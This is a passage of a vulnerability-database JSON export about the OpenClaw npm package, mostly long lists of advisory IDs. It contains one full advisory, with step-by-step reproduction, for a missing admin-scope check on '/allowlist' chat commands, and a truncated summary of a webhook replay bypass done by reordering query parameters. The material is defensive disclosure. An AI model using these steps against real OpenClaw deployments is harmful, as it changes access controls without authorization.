VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5dj5-mk23-kyds"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-66nc-bn98-nbas"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-acy1-83py-efhr"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-utv2-tyje-kfht"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vv2u-u7mn-rfe1"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24"}],"aliases":["CVE-2026-35641","GHSA-m3mh-3mpg-37hw"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-brfj-4shr-qkgc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91829?format=json","vulnerability_id":"VCID-bumq-54sb-6ua7","summary":"OpenClaw: Mutating internal `/allowlist` chat commands missed `operator.admin` scope enforcement\n> Fixed in OpenClaw 2026.3.24, the current shipping release.\n\n**Title**  \nMutating internal `/allowlist` chat commands missed `operator.admin` scope enforcement\n\n**CWE**  \nCWE-862 Missing Authorization\n\n**CVSS v3.1**  \nCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N  \nBase score: **6.5 (Medium)**\n\n**Severity Assessment**  \nMedium. This is a real authorization flaw in OpenClaw’s internal control plane. The issue does not require host access, trusted local state tampering, or multi-tenant assumptions, but exploitation does require an already authenticated internal Gateway caller with `operator.write`.\n\n**Impact**  \nAn authenticated internal Gateway caller limited to `operator.write` can perform state-changing `/allowlist` actions without `operator.admin`, even though comparable mutating internal chat commands already require `operator.admin`. The reachable effects are persistent changes to config-backed `allowFrom` entries and pairing-store-backed allowlist entries.\n\nThis is not a semantic-modeling complaint and not a generic “trusted operator can do things” claim. It is a missing authorization check inside OpenClaw’s own internal scope model, where peer mutating command surfaces already distinguish `operator.write` from `operator.admin`.\n\n**Affected Component**  \nVerified against the latest published GitHub release tag `v2026.3.23` (`ccfeecb6887cd97937e33a71877ad512741e82b2`), published `2026-03-23T23:15:50Z`.\n\nExact vulnerable path on the shipped tag:\n- `src/auto-reply/reply/commands-allowlist.ts:251-254`\n  - `/allowlist` authorization uses only `rejectUnauthorizedCommand(...)`.\n- `src/auto-reply/reply/commands-allowlist.ts:386-524`\n  - mutating config and pairing-store writes happen here, but there is no `requireGatewayClientScopeForInternalChannel(..., operator.admin, ...)`.\n\nReachability and scope model:\n- `src/gateway/method-scopes.ts:94-109`\n  - `chat.send` is a write-scoped method.\n- `src/gateway/server.chat.gateway-server-chat.test.ts:539-559`\n  - existing runtime coverage proves `chat.send` routes slash commands without an agent run.\n- `src/auto-reply/command-auth.ts:574-577`\n  - internal callers become `senderIsOwner` only when `GatewayClientScopes` includes `operator.admin`.\n\nComparable internal mutating command paths already enforce `operator.admin`:\n- `src/auto-reply/reply/commands-config.ts:64-73`\n- `src/auto-reply/reply/commands-mcp.ts:89-96`\n- `src/auto-reply/reply/commands-plugins.ts:387-394`\n- `src/auto-reply/reply/commands-acp.ts:98-106`\n\nVersion history:\n- Introduced by commit `555b2578a8cc6e1b93f717496935ead97bfbed8b` (`feat: add /allowlist command`)\n- Earliest released affected tag found: `v2026.1.20`\n- Latest released affected tag verified: `v2026.3.23`\n\n**Technical Reproduction**  \n1. Check out the shipped release tag `v2026.3.23`.\n2. Use an internal command context with:\n   - `Provider = \"webchat\"`\n   - `Surface = \"webchat\"`\n   - `GatewayClientScopes = [\"operator.write\"]`\n   - `params.command.channel = \"webchat\"`\n3. Route a slash command through `chat.send`.\n4. Execute either of these mutating commands:\n   - `/allowlist add dm channel=telegram 789`\n   - `/allowlist add dm --store channel=telegram 789`\n5. Confirm the command context is authorized but not owner-equivalent:\n   - `isAuthorizedSender === true`\n   - `senderIsOwner === false`\n6. Observe that the commands still succeed and perform persistent writes.\n\n**Demonstrated Impact**  \nThe vulnerable handler performs real state mutation for a low-scope internal caller:\n- Config-backed mutation path:\n  - `src/auto-reply/reply/commands-allowlist.ts:398-503`\n  - reads the config snapshot, applies the edit, validates, and writes the updated config to disk.\n- Store-backed mutation path:\n  - `src/auto-reply/reply/commands-allowlist.ts:479-485`\n  - `src/auto-reply/reply/commands-allowlist.ts:513-518`\n  - updates the pairing-store allowlist without any admin-scope gate.\n\nThe result is successful persistence, not just a misleading success message.\n\n**Environment**  \n- Product: OpenClaw\n- Verified shipped tag: `v2026.3.23`\n- Shipped tag commit: `ccfeecb6887cd97937e33a71877ad512741e82b2`\n- Published GitHub release time: `2026-03-23T23:15:50Z`\n- Verification date: `2026-03-24`\n\n**Duplicate Check**  \nThis is not a duplicate of:\n- `GHSA-pjvx-rx66-r3fg`\n  - that advisory covered cross-account scoping in `/allowlist ... --store`, not missing internal `operator.admin` enforcement.\n- `GHSA-hfpr-jhpq-x4rm`\n  - that advisory covered `/config` writes through `chat.send`, not `/allowlist`.\n- `GHSA-3w6x-gv34-mqpf`\n  - same authorization class, but different command path (`/acp`, not `/allowlist`).\n\n**In Scope Check**  \nThis report is in scope under `SECURITY.md` because:\n- it does **not** rely on adversarial operators sharing one gateway host or config;\n- it does **not** target the HTTP compatibility endpoints that `SECURITY.md` explicitly treats as full operator-access surfaces;\n- it demonstrates a real authorization mismatch inside OpenClaw’s own internal control-plane scope model (`operator.write` vs `operator.admin`);\n- peer mutating internal chat commands already enforce `operator.admin`, so this is not a request for a new boundary but a missing check on an existing one.\n\nThis is therefore a concrete authorization bug, not a trusted-operator hardening suggestion.\n\n**Remediation Advice**  \n1. Add `requireGatewayClientScopeForInternalChannel(..., allowedScopes: [\"operator.admin\"], ...)` to the mutating internal `/allowlist` paths.\n2. Add regression coverage for both mutation modes:\n   - internal `operator.write` must be rejected;\n   - internal `operator.admin` must be allowed.\n3. Cover both config-backed and store-backed writes.\n4. Audit other mutating internal chat-command paths for the same missing-scope pattern.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vqvg-86cc-cg83","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vqvg-86cc-cg83"},{"reference_url":"https://github.com/advisories/GHSA-vqvg-86cc-cg83","reference_id":"GHSA-vqvg-86cc-cg83","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vqvg-86cc-cg83"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110567?format=json","purl":"pkg:npm/openclaw@2026.3.24","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5dj5-mk23-kyds"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-66nc-bn98-nbas"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-acy1-83py-efhr"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-utv2-tyje-kfht"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vv2u-u7mn-rfe1"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24"}],"aliases":["GHSA-vqvg-86cc-cg83"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-bumq-54sb-6ua7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91130?format=json","vulnerability_id":"VCID-bzw7-yvu2-yqa2","summary":"OpenClaw: Voice-call Plivo V3 webhook replay key uses unsorted URL, allowing replay via query-parameter reordering\n## Summary\n\nPlivo V3 signature verification canonicalized query ordering, but replay detection hashed the raw verification URL. Reordering query parameters preserved a valid signature while producing a fresh replay-cache key.\n\n## Impact\n\nAn attacker who captured one valid signed Plivo V3 webhook could replay the same event by permuting query parameters and trigger duplicate voice-call processing.\n\n## Affected Component\n\n`extensions/voice-call/src/webhook-security.ts`\n\n## Fixed Versions\n\n- Affected: `<= 